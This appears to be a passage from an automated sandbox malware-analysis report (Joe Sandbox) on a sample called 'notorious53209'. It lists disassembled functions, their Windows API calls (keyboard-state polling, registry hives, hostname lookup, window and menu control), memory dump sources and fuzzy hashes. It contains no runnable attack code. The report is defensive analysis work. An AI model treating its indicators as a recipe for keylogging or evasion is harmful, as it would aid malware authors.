                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                                  • String ID:
                                                  • API String ID: 2751501086-0
                                                  • Opcode ID: 78fff7dfe5440dc9916fca5abeaceba3dccad82f0eed2bcb0308b7a4eb1306c1
                                                  • Instruction ID: 20216ce75b9bf57c0c30458220325eeb4aa9400ebb4996a8d6afe94998c6029b
                                                  • Opcode Fuzzy Hash: 78fff7dfe5440dc9916fca5abeaceba3dccad82f0eed2bcb0308b7a4eb1306c1
                                                  • Instruction Fuzzy Hash: 5171F27160421ABEFB209F15DC45FEABF69FB05368F200216F524EA2E1DBB16810DB95
                                                  Function 009010A5 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CharUpperBuffW.USER32(?,?), ref: 009010BC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: BuffCharUpper
                                                  • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                  • API String ID: 3964851224-909552448
                                                  • Opcode ID: 9fb54b30ba6364fe81099df98a97f25d422b4d9d74e37ddeb464310a01315c21
                                                  • Instruction ID: 9452302e9df7bfaedb018e49adcc7c1f2ef4e1a1dadf97f472227ae63eda6097
                                                  • Opcode Fuzzy Hash: 9fb54b30ba6364fe81099df98a97f25d422b4d9d74e37ddeb464310a01315c21
                                                  • Instruction Fuzzy Hash: D5418B7110424E8FDF24EF98D991AEA3768FF26300F104514EDA19B292DB34A91ACB62
                                                  Function 008E5569 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00887D2C: _memmove.LIBCMT ref: 00887D66
                                                    • Part of subcall function 00887A84: _memmove.LIBCMT ref: 00887B0D
                                                  • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 008E55D2
                                                  • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 008E55E8
                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 008E55F9
                                                  • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 008E560B
                                                  • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 008E561C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: SendString$_memmove
                                                  • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                  • API String ID: 2279737902-1007645807
                                                  • Opcode ID: 40682b1631f49a2fcf22020cb833ed9b6a8b6ffd9b760bbe2893732fa8b2547f
                                                  • Instruction ID: 0196e7acf03e139eed939550c14f7a1bbbbaddeabc7515ea3271d77445d05ad5
                                                  • Opcode Fuzzy Hash: 40682b1631f49a2fcf22020cb833ed9b6a8b6ffd9b760bbe2893732fa8b2547f
                                                  • Instruction Fuzzy Hash: 5011C42056016979D724B6A6CC8ADFF7B7CFFE2F08F500429B445E20D1EE605E05CAA2
                                                  Function 008E48F3 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                  • String ID: 0.0.0.0
                                                  • API String ID: 208665112-3771769585
                                                  • Opcode ID: 2cdae4e7502c808d528032b592f7c077495ac81a8ab6229b27c408225e030c07
                                                  • Instruction ID: 3a8266d41b5c5dbf7c444f9904627165cce231752c1a40a9bdaf5f1d2c0a2561
                                                  • Opcode Fuzzy Hash: 2cdae4e7502c808d528032b592f7c077495ac81a8ab6229b27c408225e030c07
                                                  • Instruction Fuzzy Hash: 2611D831908114AFDB30FB299C49EDB7BACFB42710F044175F449E6462EFB09A819652
                                                  Function 008E5217 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • timeGetTime.WINMM ref: 008E521C
                                                    • Part of subcall function 008A0719: timeGetTime.WINMM ref: 008A071D
                                                  • Sleep.KERNEL32(0000000A), ref: 008E5248
                                                  • EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 008E526C
                                                  • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 008E528E
                                                  • SetActiveWindow.USER32 ref: 008E52AD
                                                  • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 008E52BB
                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 008E52DA
                                                  • Sleep.KERNEL32(000000FA), ref: 008E52E5
                                                  • IsWindow.USER32 ref: 008E52F1
                                                  • EndDialog.USER32(00000000), ref: 008E5302
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                  • String ID: BUTTON
                                                  • API String ID: 1194449130-3405671355
                                                  • Opcode ID: ed942f326e221df780c2797e13cf6fa08f6f00efc2887b468799df0bb4a81297
                                                  • Instruction ID: c987a0e248b7787d335a58fa95170f049e1f034ac80e10348e32cef4500660b0
                                                  • Opcode Fuzzy Hash: ed942f326e221df780c2797e13cf6fa08f6f00efc2887b468799df0bb4a81297
                                                  • Instruction Fuzzy Hash: F421A47412C748AFE7105FA1EC98E267B69FB4734AF000434F501C6AB1CBA19D40AB62
                                                  Function 008ED7F8 Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00889997: __itow.LIBCMT ref: 008899C2
                                                    • Part of subcall function 00889997: __swprintf.LIBCMT ref: 00889A0C
                                                  • CoInitialize.OLE32(00000000), ref: 008ED855
                                                  • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 008ED8E8
                                                  • SHGetDesktopFolder.SHELL32(?), ref: 008ED8FC
                                                  • CoCreateInstance.OLE32(00912D7C,00000000,00000001,0093A89C,?), ref: 008ED948
                                                  • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 008ED9B7
                                                  • CoTaskMemFree.OLE32(?), ref: 008EDA0F
                                                  • _memset.LIBCMT ref: 008EDA4C
                                                  • SHBrowseForFolderW.SHELL32(?), ref: 008EDA88
                                                  • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 008EDAAB
                                                  • CoTaskMemFree.OLE32(00000000), ref: 008EDAB2
                                                  • CoTaskMemFree.OLE32(00000000), ref: 008EDAE9
                                                  • CoUninitialize.OLE32 ref: 008EDAEB
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                  • String ID:
                                                  • API String ID: 1246142700-0
                                                  • Opcode ID: 663931ce4e88b0101d61ab7dc5132317088d2c31838cd3554f039a4f85df7c41
                                                  • Instruction ID: 033373c0169dda28459cdca66ab8f7ba1044b58ac740a4633997216b16f2d70b
                                                  • Opcode Fuzzy Hash: 663931ce4e88b0101d61ab7dc5132317088d2c31838cd3554f039a4f85df7c41
                                                  • Instruction Fuzzy Hash: 7EB10D75A00219AFDB14DFA9C888DAEBBF9FF49304B048469F905EB251DB30EE45CB51
                                                  Function 008E052C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetKeyboardState.USER32(?), ref: 008E05A7
                                                  • SetKeyboardState.USER32(?), ref: 008E0612
                                                  • GetAsyncKeyState.USER32(000000A0), ref: 008E0632
                                                  • GetKeyState.USER32(000000A0), ref: 008E0649
                                                  • GetAsyncKeyState.USER32(000000A1), ref: 008E0678
                                                  • GetKeyState.USER32(000000A1), ref: 008E0689
                                                  • GetAsyncKeyState.USER32(00000011), ref: 008E06B5
                                                  • GetKeyState.USER32(00000011), ref: 008E06C3
                                                  • GetAsyncKeyState.USER32(00000012), ref: 008E06EC
                                                  • GetKeyState.USER32(00000012), ref: 008E06FA
                                                  • GetAsyncKeyState.USER32(0000005B), ref: 008E0723
                                                  • GetKeyState.USER32(0000005B), ref: 008E0731
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: State$Async$Keyboard
                                                  • String ID:
                                                  • API String ID: 541375521-0
                                                  • Opcode ID: aae48c2ffd372018d69b25287b6dd6c260b6de24707f097b3aa3adbd9e7a054e
                                                  • Instruction ID: 615c184612666c984d685d9306af7103395d8b524629cf1f9b17ac7db80324d6
                                                  • Opcode Fuzzy Hash: aae48c2ffd372018d69b25287b6dd6c260b6de24707f097b3aa3adbd9e7a054e
                                                  • Instruction Fuzzy Hash: 1F51CB70A047C419FF35DBA588547EABFB4EF13340F08499995C2961C2D6A49BCCCF62
                                                  Function 008DC72A Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetDlgItem.USER32(?,00000001), ref: 008DC746
                                                  • GetWindowRect.USER32(00000000,?), ref: 008DC758
                                                  • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 008DC7B6
                                                  • GetDlgItem.USER32(?,00000002), ref: 008DC7C1
                                                  • GetWindowRect.USER32(00000000,?), ref: 008DC7D3
                                                  • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 008DC827
                                                  • GetDlgItem.USER32(?,000003E9), ref: 008DC835
                                                  • GetWindowRect.USER32(00000000,?), ref: 008DC846
                                                  • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 008DC889
                                                  • GetDlgItem.USER32(?,000003EA), ref: 008DC897
                                                  • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 008DC8B4
                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 008DC8C1
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Window$ItemMoveRect$Invalidate
                                                  • String ID:
                                                  • API String ID: 3096461208-0
                                                  • Opcode ID: 1a1fe1a0d3725c498a07189863cbf42e26cedfdc02dc440debdec74f1eda72e1
                                                  • Instruction ID: aa58b601442c8da2662d3927d2ceddef105db1f470d2c7770b6245350e5c14d2
                                                  • Opcode Fuzzy Hash: 1a1fe1a0d3725c498a07189863cbf42e26cedfdc02dc440debdec74f1eda72e1
                                                  • Instruction Fuzzy Hash: 47512E71B10209AFDB18CF69DD99AAEBBBAFB88311F148239F515D7290D7709E00DB50
                                                  Function 008821A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 008825DB: GetWindowLongW.USER32(?,000000EB), ref: 008825EC
                                                  • GetSysColor.USER32(0000000F), ref: 008821D3
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: ColorLongWindow
                                                  • String ID:
                                                  • API String ID: 259745315-0
                                                  • Opcode ID: 1e1aedb4f90f93d9a787a297861c45ea7156f0669aa880a0afe98cd554be71dc
                                                  • Instruction ID: b910125abee0866ad204e89d0556c007ccc30b87d03f0e6d57bf45d4d02fa650
                                                  • Opcode Fuzzy Hash: 1e1aedb4f90f93d9a787a297861c45ea7156f0669aa880a0afe98cd554be71dc
                                                  • Instruction Fuzzy Hash: 1C41B231108144AFDB21AF28DC98BB97B66FB46335F144365FD65CA2E2C7318D42EB61
                                                  Function 008EAB12 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CharLowerBuffW.USER32(?,?), ref: 008EAB76
                                                  • GetDriveTypeW.KERNEL32(00000061,0093A620,00000061), ref: 008EAC40
                                                  • _wcscpy.LIBCMT ref: 008EAC6A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: BuffCharDriveLowerType_wcscpy
                                                  • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                  • API String ID: 2820617543-1000479233
                                                  • Opcode ID: 2b7e84d9eb61eb4d30d7ebe0251a347006f8d381a4e1d1d9676dac12de6a1b64
                                                  • Instruction ID: ca58795ec24828b2e7531f94f184ae821c7ea1d2079451991dd517526fbb0028
                                                  • Opcode Fuzzy Hash: 2b7e84d9eb61eb4d30d7ebe0251a347006f8d381a4e1d1d9676dac12de6a1b64
                                                  • Instruction Fuzzy Hash: 6251AD311083459BC728EF19C891AAEB7A5FF86B14F144829F4D6D72A2DB31E909CB53
                                                  Function 00889997 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: __i64tow__itow__swprintf
                                                  • String ID: %.15g$0x%p$False$True
                                                  • API String ID: 421087845-2263619337
                                                  • Opcode ID: a3b925c32687120e9d2bb11b99cbb7391b7deeeab4f89791e664af0b02f01f7e
                                                  • Instruction ID: 364bae6a8260198223cf2037e73169e57b9298dd2f97ca335ccc36825ae9f356
                                                  • Opcode Fuzzy Hash: a3b925c32687120e9d2bb11b99cbb7391b7deeeab4f89791e664af0b02f01f7e
                                                  • Instruction Fuzzy Hash: 9141B671604209AFEB24AB38DC41F7A7BE8FB45314F24446EF689D6292EE7199418B12
                                                  Function 009073C1 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _memset.LIBCMT ref: 009073D9
                                                  • CreateMenu.USER32 ref: 009073F4
                                                  • SetMenu.USER32(?,00000000), ref: 00907403
                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00907490
                                                  • IsMenu.USER32(?), ref: 009074A6
                                                  • CreatePopupMenu.USER32 ref: 009074B0
                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 009074DD
                                                  • DrawMenuBar.USER32 ref: 009074E5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                  • String ID: 0$F
                                                  • API String ID: 176399719-3044882817
                                                  • Opcode ID: 58e11f7a2ba224f063b762eb858d39898512b3c817d4966dc7caa4d6032d056b
                                                  • Instruction ID: cfab1ea6a24bf858680d32d107ef5a021679360bd78a511c537f44a31b234bb4
                                                  • Opcode Fuzzy Hash: 58e11f7a2ba224f063b762eb858d39898512b3c817d4966dc7caa4d6032d056b
                                                  • Instruction Fuzzy Hash: 3C415978A04205EFDB20DFA8D884EAABBFAFF49310F144429F955973A0D730A920DF50
                                                  Function 0090772A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000), ref: 009077CD
                                                  • CreateCompatibleDC.GDI32(00000000), ref: 009077D4
                                                  • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 009077E7
                                                  • SelectObject.GDI32(00000000,00000000), ref: 009077EF
                                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 009077FA
                                                  • DeleteDC.GDI32(00000000), ref: 00907803
                                                  • GetWindowLongW.USER32(?,000000EC), ref: 0090780D
                                                  • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00907821
                                                  • DestroyWindow.USER32(?), ref: 0090782D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                  • String ID: static
                                                  • API String ID: 2559357485-2160076837
